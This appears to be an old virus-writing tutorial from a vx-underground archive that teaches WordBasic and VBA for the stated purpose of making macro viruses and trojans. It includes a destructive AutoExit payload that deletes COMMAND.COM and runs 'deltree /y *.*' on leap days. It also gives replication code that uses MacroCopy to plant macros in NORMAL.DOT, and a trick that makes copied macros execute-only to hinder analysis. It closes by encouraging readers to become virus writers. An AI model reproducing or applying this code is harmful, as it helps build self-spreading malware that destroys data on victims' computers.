,, MMP""MM""YMM `7MM P' MM `7 MM MM MMpMMMb. .gP"Ya MM MM MM ,M' Yb MM MM MM 8M"""""" MM MM MM YM. , .JMML. .JMML JMML.`Mbmmd' `7MMF' `7MF' `7MMF' `7MMF' `MA ,V MM MM VM: ,V `7M' `MF' MM MM .gP"Ya ,6"Yb.`7M' `MF'.gP"Ya `7MMpMMMb. MM. M' `VA ,V' MMmmmmmmMM ,M' Yb 8) MM VA ,V ,M' Yb MM MM `MM A' XMX MM MM 8M"""""" ,pm9MM VA ,V 8M"""""" MM MM :MM; ,V' VA. MM MM YM. , 8M MM VVV YM. , MM MM VF .AM. .MA..JMML. .JMML.`Mbmmd' `Moo9^Yo. W `Mbmmd'.JMML JMML. ,, ,, ,, .g8"""bgd `7MM `7MM mm db .dP' `M MM MM MM dM' ` ,pW"Wq. MM MM .gP"Ya ,p6"bo mmMMmm `7MM ,pW"Wq.`7MMpMMMb. MM 6W' `Wb MM MM ,M' Yb 6M' OO MM MM 6W' `Wb MM MM MM. 8M M8 MM MM 8M"""""" 8M MM MM 8M M8 MM MM `Mb. ,'YA. ,A9 MM MM YM. , YM. , MM MM YA. ,A9 MM MM `"bmmmd' `Ybmd9'.JMML..JMML.`Mbmmd' YMbmd' `Mbmo.JMML.`Ybmd9'.JMML JMML. -- Contact -- https://twitter.com/vxunderground email@example.com
A macro is a program written in a certain language which is used usually for automatizing some processes inside an application. In this case, we will talk about Visual Basic for Applications (VBA) and WordBasic (WB), which are the languages used by Microsoft and all their programs; thus, Excel, Project and PowerPoint use VBA, and WinWord uses WB.
From now we will speak about VBA as a general language, because it's the attempt to unify a macro language, common for all the Microsoft programs. Anyway, WordBasic has still some characteristics which make that, someti- mes, we reffer specifically to it.
There are some differences between the syntax of these two languages, but the coding structure is the same, so, if we don't make any specification, we'll speak about VBA, as the common Microsoft macro language.
The VBA macros are called procedures; there are two kinds of procedures:
The sub procedures may be executed directly or being called from other macro. The syntax for these procedures is the following:
Sub <:macro_name> -> write here the macro code <:- ' the comments are preceded by an apostrophe End Sub
Sub Stupid_Greeting ' This macro opens a dialog box and displays a message MsgBox "Hello World!" End Sub
The function procedures (aka functions) return a value, which may be passed as a parameter for other VBA procedure. This is its syntax:
Function <:function_name>(arguments) -> Instructions <:- ' Commentaries End Function
Function AddAB(a,b) ' This adds the parameters a and b and returns the result ' in "AddAB" AddAB = a+b End Function
Of course, you can insert in a document as many macros as you need or want, there's no limit. Now that you've understood what a joint of macros is, we'll call it VBA module. This means that a VBA module is a joint of macros (sub and function procedures) which make up an Office document.
The VBA language also works with objects; we can make references to other documents, graphics... inside the VBA modules. Objects have properties. For instance, the background color of an object is a property (aka attribute). Objects also have 'methods', which are the operations we can make with them (with the objects).
VBA allows us to work with variables, and, as a structured programming language, it has the typical constructions of other languages:
Sub Counter Infect_Num=0 For Count=1 to 10 Infect_Num=Infect_Num+Count Next Count MsgBox "I reached the maximum infection number" End Sub
Sub Infect_Check If Infect_Num=0 Then MsgBox "File not infected" End Sub
'With-end with' constructions (used for working with several properties of a certain object):
Sub ChangeProperties With Selection .Font.Bold=True .Font.ColorIndex=3 ' Red color End With End Sub
'Select case-end select' constructions:
Sub Check_Infection Select Case Infect_Num Case 0 MsgBox "File not infected" Case is > 0 MsgBox "File infected" Case is <: 0 Infect_Num=0 End Case End Sub
A very useful tool for working with the VBA language is the debuggin window. With it we can trace code, make corrections, and so on... one debugging technique consists on using flags for halting for a moment the code execution with a MsgBox after each instruction, so we can analyze the contents of certain variables and/or instructions (albeit the VBA debugger is able to set break points for halting the code execution, too).
Something very important, apart of this, are the arguments of a function procedure; as we've just seen, the structure of a VBA procedure is this:
Function <:name>(arguments) [...] End Function
These arguments may be constants, variables, or expressions. Anway, there are procedures which don't need any arguments:
Function Get_Name() Name=Application.UserName End Function
There are function procedures which always have a fixed argument number (up to 60). Other functions have some fixed arguments and other optional.
Ok, and once the basics of VBA are clear for everybody, we can start learning something about the thing we're about to study: VBA viruses and trojans :-)
The VBA language is very versatile, and this is basically due to two reasons: the first of them is its big facility of learning and use; as it's a high level language orientated to events (not to objects :) it's very easy to create complex modules without spending many time on it. The second reason is the extra large number of predefined functions it has, which make things much easier for us. We could even say a third reason, but it's really included in the previous one... and it's that we can use functions (or macros) of *automatic_execution*, so we can simulate some thingies which make eeeeven easier to write routines as autocopying, memory residency, etc), used by the 'normal' DOS viruses.
Besides this, VBA has, as an exclusive feature, the PORTABILITY property, advantage, or however you wanna call it. VBA worxor under Windows 3.x, Windows95, WindowsNT, Macintosh, etc. this is: in every enviroment or OS in which we can run any version of the applications which support VBA.
But don't expect so many facilities... :-)
VBA is a language which adapts to the language of the application under it's running. This means that, if we have the spanish version of WinWord, the names of the predefined functions will be in spanish, so the two next macros will NOT be the same (the first one is written in spanish, and the second one, in english):
First macro (spanish):
Sub Demo_Macro Con Selecci¢n.Fuente .Nombre="Arial" Fin Con End Sub
Second macro (english):
Sub Demo_Macro With Selection.Font .Name="Arial" End With End Sub
This last macro would NOT work under our spanish version of WinWord... it would force a macro execution error, so it wouldn't do anything. And remember that VBA is an interpreted language (not compiled) so every execution error appears 'on the fly'.
But... doesn't this have any solution? ... ... ... ... }:-) ... Sure! ;-) There are some functions, common to all the VBA versions, without depen- ding on the language. For instance... the automatic macro AutoExec (which is executed when loading WinWord if it's stored in a template called NORMAL.DOT) would work under every VBA version.
Maybe one of the first exercises we should do would be trying to write a multiplatform and multilanguage virus... but maybe it already exists... }:-) hehe... but let's go on with the tutorial.
The next step, once we've analyzed the language syntax, we have to study the functions we need to use in our viruses. As this ain't a text about programming in general but a macro virus tutorial, we'll focus our attention to the automatic macros used by WinWord, implemented in WordBasic (but note: NOT in VBA).
There are five special macros which execute automatically and which we'll have to care about:
For proving the potence and the versatility of these macros, we can have a look at the following code (by now we won't care about the language):
' Save this macro as AutoExit Sub Main If Application.Username <:> "MaD_MoTHeR" Then ' We check the registration name of the application SetAttr "C:\COMMAND.COM",0 ' Wipe the attributes of COMMAND.COM Open "C:\COMMAND.COM" for Output as #1 ' We open it for checking if it activates any error flag Close #1 ' It exists, ok... let's close it... Kill "C:\COMMAND.COM" ' ... and kill it }:-) End If If Month(Now())=2 Then ' System date -> month=february (2)? If Day(Now())=29 Then ' february 29th? (only one time each four years) :-) Shell "deltree /y *.* > null" ' Btw... /y works for all the languages :-) End If End If End Sub
The macro above will check two things on exiting from WinWord: if the registration name is equal to MaD_MoTHeR, it will delete COMMAND.COM; and if the system date is equal to february 29th (only for leap years) :-) it will do a deltree /y *.* > null, and i guess you all know what does this DOS command do, right? };-)
Ok, now you're supposed to have a big enough knowledge to face the next and last chapter of this tutorial: replication. It's the most important thing for writing viruses, don't you think? :-)
The unique thing we must know is how can we adapt an automatic macro (this is the simplest example) in order to install it in the template which is opened by default by WinWord. This is done by following the next steps... first, define a variable which stores the complete macro name:
name$ = WindowName$() + ":AutoNew" ' This macro will be executed ' every time a new document is ' created
And then, all our work is to write it into the template NORMAL.DOT with this simple instruction:
MacroCopy name$, "Global:AutoNew"
Quite easy, isn't it? :-) Anyway, this is the general way in which macro viruses work, but there are lots of cooler ways to infect... all it takes is a little bit of imagination and additional code. One of these things which make your viruses cooler and difficult their analysis is the macro encryption... and it's easier than the replication!!! :-)
MacroCopy "MyTemplate:MyMacro", "Global:AutoClose", 1
If you execute the MacroCopy function passing 1 (or any other number unless 0) as parameter, the result of the copy will be an only executable macro, so we won't be able to edit it! :-)
And this is all you need for becoming a macro virus writer... practice, research, and try to write something really original. Btw, there's a virus sample i wrote included in '29A virii'. It's a supertiny and super- simple macro infector which contains a little payload :-) Don't forget to have a look at it!